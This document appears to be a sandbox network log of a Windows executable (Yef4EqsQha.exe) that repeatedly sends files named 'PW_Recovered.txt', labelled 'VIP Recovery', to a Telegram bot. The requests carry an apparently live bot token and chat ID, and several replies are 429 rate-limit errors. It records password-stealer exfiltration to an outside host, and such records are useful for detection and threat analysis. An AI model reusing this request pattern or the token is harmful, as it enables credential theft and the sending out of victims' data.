2025-01-10 22:07:22 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41005,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546842,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 50007 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:23 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd34dd1c714d92
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:23 UTC | 585 | OUT | Data Ascii:
--------------------------8dd34dd1c714d92
Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"
Content-Type: application/x-ms-dos-executable

PW | user | VIP Recovery

PC Name:216554
Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:23 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:23 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:23 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41006,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546843,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 50008 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:24 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd34fa2af9aca0
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:24 UTC | 585 | OUT | Data Ascii:
--------------------------8dd34fa2af9aca0
Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"
Content-Type: application/x-ms-dos-executable

PW | user | VIP Recovery

PC Name:216554
Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:24 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:24 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:24 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41007,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546844,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 50009 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:25 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd351d7aa4bd0f
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:25 UTC | 585 | OUT | Data Ascii:
--------------------------8dd351d7aa4bd0f
Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"
Content-Type: application/x-ms-dos-executable

PW | user | VIP Recovery

PC Name:216554
Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:25 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:25 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:25 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41008,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546845,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 50010 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:26 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd354481d11c88
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:26 UTC | 585 | OUT | Data Ascii:
--------------------------8dd354481d11c88
Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"
Content-Type: application/x-ms-dos-executable

PW | user | VIP Recovery

PC Name:216554
Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:26 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:26 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:26 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41009,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546846,"document"


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            26 | 192.168.2.7 | 50011 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2025-01-10 22:07:27 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd35652fc0d40e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:27 UTC | 585 | OUT
                                                                                                            Data Ascii: --------------------------8dd35652fc0d40eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:30 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:30 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:30 UTC | 534 | IN
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41010,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546850,"document"


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            27 | 192.168.2.7 | 50012 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2025-01-10 22:07:31 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd35fa1b258218
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:31 UTC | 585 | OUT
                                                                                                            Data Ascii: --------------------------8dd35fa1b258218Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:31 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:31 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:31 UTC | 534 | IN
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41011,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546851,"document"


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            28 | 192.168.2.7 | 50013 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2025-01-10 22:07:32 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3635e1258cc8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:32 UTC | 585 | OUT
                                                                                                            Data Ascii: --------------------------8dd3635e1258cc8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:32 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:32 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:32 UTC | 534 | IN
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41012,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546852,"document"


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            29 | 192.168.2.7 | 50014 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2025-01-10 22:07:33 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3681b72dd0b8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:33 UTC | 585 | OUT
                                                                                                            Data Ascii: --------------------------8dd3681b72dd0b8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:33 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:33 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:33 UTC | 534 | IN
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41013,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546853,"document"


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            30 | 192.168.2.7 | 50015 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2025-01-10 22:07:34 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd36a5d1642b7d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:34 UTC | 585 | OUT
                                                                                                            Data Ascii: --------------------------8dd36a5d1642b7dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:34 UTC | 370 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:34 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 111
                                                                                                            Connection: close
                                                                                                            Retry-After: 10
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:34 UTC | 111 | IN
                                                                                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            31 | 192.168.2.7 | 50016 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2025-01-10 22:07:35 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd36f2934ae498
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:35 UTC | 585 | OUT
                                                                                                            Data Ascii: --------------------------8dd36f2934ae498Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:35 UTC | 369 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:35 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 109
                                                                                                            Connection: close
                                                                                                            Retry-After: 9
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:35 UTC | 109 | IN
                                                                                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            32 | 192.168.2.7 | 50017 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2025-01-10 22:07:36 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3744214678b7
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:36 UTC | 585 | OUT
                                                                                                            Data Ascii: --------------------------8dd3744214678b7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:44 UTC | 369 | IN | HTTP/1.1 429 Too Many Requests
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:44 GMT
Content-Type: application/json
Content-Length: 109
Connection: close
Retry-After: 3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:44 UTC | 109 | IN | Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 50018 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:45 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd39fc539c7760
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:45 UTC | 585 | OUT | Data Ascii: --------------------------8dd39fc539c7760Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:45 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:45 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:45 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41014,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546865,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 50019 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:46 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3a42a08a2d1a
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:46 UTC | 585 | OUT | Data Ascii: --------------------------8dd3a42a08a2d1aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:46 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:46 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:46 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41015,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546866,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 50020 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:47 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3a8a01617b77
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:47 UTC | 585 | OUT | Data Ascii: --------------------------8dd3a8a01617b77Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:47 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:47 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:47 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41016,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546867,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.7 | 50021 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:48 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3ad90f094b47
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:48 UTC | 585 | OUT | Data Ascii: --------------------------8dd3ad90f094b47Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:48 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:48 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:48 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41017,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546868,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 50022 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:49 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3b27997aeb2a
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:49 UTC | 585 | OUT | Data Ascii: --------------------------8dd3b27997aeb2aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:52 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:52 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:52 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41018,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546872,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 50023 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:53 UTC | 377 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3c6dcdf66e26
Host: api.telegram.org
Content-Length: 585
Connection: Keep-Alive
2025-01-10 22:07:53 UTC | 585 | OUT | Data Ascii: --------------------------8dd3c6dcdf66e26Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:53 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:53 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
